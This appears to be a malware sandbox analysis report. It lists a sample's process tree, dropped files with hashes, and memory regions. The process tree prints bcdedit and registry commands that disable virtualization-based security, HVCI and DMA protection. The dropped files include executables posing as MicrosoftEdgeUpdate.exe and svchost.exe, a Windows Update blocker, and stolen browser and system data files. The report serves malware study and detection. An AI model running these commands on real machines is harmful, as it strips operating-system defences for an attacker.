                                                                                                                                                                                                                                                                                                                        bcdedit /set linearaddress57 OptOut
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set increaseuserva 268435328
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:1752
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                        PID:3324
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set isolatedcontext No
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:2532
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set allowedinmemorysettings 0x0
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:3356
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                        timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                        PID:4192
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set vsmlaunchtype Off
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:4328
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                        bcdedit /set vm No
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                        PID:3856
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                        Reg.exe add "HKLM\Software\Policies\Microsoft\FVE" /v "DisableExternalDMAUnderLock" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:4060
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:696
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                            Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DeviceGuard" /v "HVCIMATRequired" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:1808
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:3540
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set x2apicpolicy Enable
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:4940
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set uselegacyapicmode No
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:3228
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:5060
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set configaccesspolicy Default
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:3600
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set MSI Default
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:2172
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set usephysicaldestination No
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:4028
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                                                                                                                                                              bcdedit /set usefirmwarepcisettings No
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                                                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                              timeout /t 1 /nobreak
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                              PID:4436
                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\MicrosoftEdgeUpdate.exe
                                                                                                                                                                                                                                                                                                                            C:\ProgramData\MicrosoftEdgeUpdate.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s PushToInstall
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                            PID:3152
                                                                                                                                                                                                                                                                                                                          • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.469_none_04a25ac34c904574\TiWorker.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.469_none_04a25ac34c904574\TiWorker.exe -Embedding
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            PID:1016
                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\MicrosoftEdgeUpdate.exe
                                                                                                                                                                                                                                                                                                                            C:\ProgramData\MicrosoftEdgeUpdate.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:4516

                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\4ecfcad46d0735dbf6e822410f4bb9d1\Admin@ITMJLVNR_en-US\Browsers\Firefox\Bookmarks.txt

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            105B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2e9d094dda5cdc3ce6519f75943a4ff4

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            5d989b4ac8b699781681fe75ed9ef98191a5096c

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\4ecfcad46d0735dbf6e822410f4bb9d1\Admin@ITMJLVNR_en-US\System\Process.txt

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            71b0487ed759841f671fd15f3e642f28

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            24f957aa10b994d8536acdfae49dce51a0a5465d

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            b22a49a539f370cdb008f29bc97424b62c49c4afaf06db2b52e9a56deb460f6f

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            a5d64645e52525b39281144c6b5de763bebf81a6415c17bb88aa5aba9939fccc97527eb77f426da19595debfc7dbeffa0bf316926cc85ae2a45ab24f67052020

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\4ecfcad46d0735dbf6e822410f4bb9d1\msgid.dat

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            5B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            0db6e953a1243a873578a79579c1aa7a

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            5a6b796045a97be229cf431cf7ecce98aed95dce

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            871202ab81bb50a7cfa5e0a9661cfd947654053bf8bdb3f479f1a3b6639dcf9f

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            4c163f3c65d2d783cab5cd559c436c02119669dcc943fad6955846ac1d1f0ec97f5d34a536b44a2add30a7c9f6159fe0694a8568808aa0ca06c8dbea2f960f03

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            86KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            51cdbf80fae38e82aa1c6ac3c86081a8

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            b4a00a40555f6d7655a80ef0aaab920c35994743

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            70e63eb524c1d6dbe4f4fa276d3f4d2756108cb5a4f4ebb9a6264fcbd5d4a73b

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            aa69c54770a36eba26b1408aaf0338975b4bd1b3dd118de71d81882671c86fc6b0c80567c67ffb6cd3c1a3f98ac02fe6ac5d9495a03531bcff1ecc61574c85e1

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftEdgeUpdate.exe.log

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            654B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2cbbb74b7da1f720b48ed31085cbd5b8

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            79caa9a3ea8abe1b9c4326c3633da64a5f724964

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            88dc70c361a22feac57b031dd9c1f02f

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            a9b4732260c2a323750022a73480f229ce25d46d

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            64B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            1a11402783a8686e08f8fa987dd07bca

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            580df3865059f4e2d8be10644590317336d146ce

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            904c9e9f7251b6f4037f077a4a4685a4

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            0d9a7308a129a6dd618166a66acf6b04849dd769

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            96fd6fdaeaa66389e084b9770a75c0bcadf2d78980657c9c6055ff3fb068eb45

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            b16ce62361a39ff934843cc8fd8bd51d97cd2371a4aa40467f3b18788766c30409685c17f376a68e80bb1f83df95f455f155d9adef75ee46edce3bc4fcfc5a2d

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            5abe0fa2ce2397da512219546b9d9160

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            db676572745396f52ddd2cdbbb643a7c1e786d70

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            0ed3dfa85f0fc41a587aa07e27cb60564e02a06ca6ff1932aaef3d423e06ca7d

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            24b166ae61f62b3fb345911dca52e23104cf370e9f5ff515394ca8a48edc2c6a2553315e1dfc0a03aaf81f7cb23eb0ee1ed95770af02a336eabf87394b3c1ce8

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1g9a5k2v.tmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            2db4c5aa3664b87ccc47acdb9720a13d

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            6cbfe623cf640a1c028dc585c06eeb76a6337bd3

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            f846d2dcfbbd5f32431f9a377328f663109e4a636dbb2cb039bb51480c8e87af

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            c03df33918de644d4feea76ffffbb6af55f645615c84a282c00f6c635567c936cf10111076809a2d4ff7701dccef437aa346245fdf54a52cacda991b52620498

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1g9a5k2v.tmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            ad004bb978c11baf9986b02a1c6bbe97

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            ec16ca112ce13e5314d4a08db602798828982e0c

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            cae8d9a5d4e8e059cc5ff6add0493f85767c409f726aca075985730cd943d10c

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            043136d26f4d83df3f38623983f6a8516e84a3d5f3727e5b3c7c4becd02a29016508c0753253ed14d04ddca880987b25f8896e5ff69705dc8232ce49e6a3f12c

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1i3l4s4c.tmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            904120fc6fa85e69127e5d0280841bca

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            3d50add894ed7eb2888a0209d39ef481718b9ce8

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            8c9ad246e10ee64dfa5f1893f844ad6764dad6e2e2300413ea6562a3f234fdb6

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            968c3bd35f5bd66301fd5118870d1d1de02342b15d1636f48985235b3bda8f799945aeb8770fbaf0675d628198ecc04bccc8d011e368bafe6729b1360a6ca190

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikrw5adb.fbe.ps1

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            60B

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\exm.zip

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            13.2MB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            9a8facedca4f5b7a39e120bff80421b7

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            7c3b501b2ce75c76d47aba44d6483f21e52750dc

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            f638f0781e710bf6fa735808d688ebef3c2b97c0a6b7a33675e16c2435730ef2

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            c0d170072af13f53f650ef9b5e7444b0a36b838fdf9a97ba42e3ac7e01c38e3aa9f053342b99458e3ab9bdc662c90a18f09da45011665f297e873856edf90c9e

                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\svchost.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            225KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            8008775094d446eaed43a423cd8a26f9

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            4b8ef16e4a70fed23dc20cc5e27566df1e06af04

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            48a06f8dbe0c56894b38bb3489c8ed5243d246328c512ee265bc31de441b5e1f

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            6d9f2dca0d9032702971b339b7df65efab1c95d76e89044cf36ed43ef3116d21d1203d1561bd5fb4bd838d4df3dfbd240e2c89b715400f7a89037a3757326792

                                                                                                                                                                                                                                                                                                                          • C:\exm\EXMservice.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            12.0MB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            f189114f5f8504a1aeb97a90e71ea429

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            a2d029f042000b7e3ec175e1e365d9bf20396092

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            31709442f1ff903433dec01461829a0c05b62f0e7cab81f2efcd1a0b0845d748

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            5f939df2c5bc1f3c4f5b1fd835a7ab882d49fed5c5ebd7a41deba37b3f7ba423d194ccaad39aa3032d9454570d8863bdb93cca9c99ee12cf64dbc478b2dfcbbb

                                                                                                                                                                                                                                                                                                                          • C:\exm\WindowsUpdateBlocker\Wub.exe

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            791KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            82aff8883099cf75462057c4e47e88ac

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            68e2939f59b3869e9bd3ecc4aca3947649631bf8

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            aac1123f17f8569a36bf93876cea30e15103fd2379b401a79129a2a6e7285ac2

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            212ac940a1f8bdd805813c279d471efc53b858bc35c5edad182dfde3c29c37854618a507a0a0839e5a383d1ba4fe317c0b3c8275d023c86ecfa36f221560b96d

                                                                                                                                                                                                                                                                                                                          • C:\exm\WindowsUpdateBlocker\Wub.ini

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            97KB

                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                            a16bf55cd2ef7d9e56565b0ed1aa208a

                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                            19edddaa24f73d9d01150babd58b1bcc0ff5d849

                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                            30eb977d58106050818626b9b556a3badc7b7d012462903120a0663987c74c0b

                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                            ab87d94620b0d77bfa8ff3e721bbb68a28185245b173be7b62195588e2a3b3d3a9ee085497300c14876118dff4edca7fea202328f3156a76c53f786b8d5b6118

                                                                                                                                                                                                                                                                                                                          • memory/792-27-0x00000267315F0000-0x0000026731602000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                                                                                                                          • memory/792-28-0x00000267315D0000-0x00000267315DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                                                          • memory/1004-10-0x00007FFDEC050000-0x00007FFDECB12000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                                                          • memory/1004-6-0x0000023AE78B0000-0x0000023AE78D2000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                                                          • memory/1004-11-0x00007FFDEC050000-0x00007FFDECB12000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                                                          • memory/1004-12-0x00007FFDEC050000-0x00007FFDECB12000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                                                          • memory/1004-15-0x00007FFDEC050000-0x00007FFDECB12000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            10.8MB

                                                                                                                                                                                                                                                                                                                          • memory/1004-0-0x00007FFDEC053000-0x00007FFDEC055000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                          • memory/1212-90-0x0000000000200000-0x000000000021C000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            112KB

                                                                                                                                                                                                                                                                                                                          • memory/3116-70-0x0000000000160000-0x00000000001C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            392KB

                                                                                                                                                                                                                                                                                                                          • memory/3888-326-0x0000015C78770000-0x0000015C788BF000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                                          • memory/4764-258-0x0000000007990000-0x00000000079A2000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                                                                                                                          • memory/4764-249-0x0000000006930000-0x000000000693A000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                                                          • memory/4764-245-0x0000000006EA0000-0x0000000007446000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                                                                                          • memory/4764-244-0x0000000006850000-0x00000000068E2000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            584KB

                                                                                                                                                                                                                                                                                                                          • memory/4764-96-0x0000000005CC0000-0x0000000005D26000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            408KB

                                                                                                                                                                                                                                                                                                                          • memory/4764-95-0x0000000000E30000-0x0000000000E6E000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            248KB

                                                                                                                                                                                                                                                                                                                          • memory/4836-366-0x000001D4FB450000-0x000001D4FB59F000-memory.dmp

                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                            1.3MB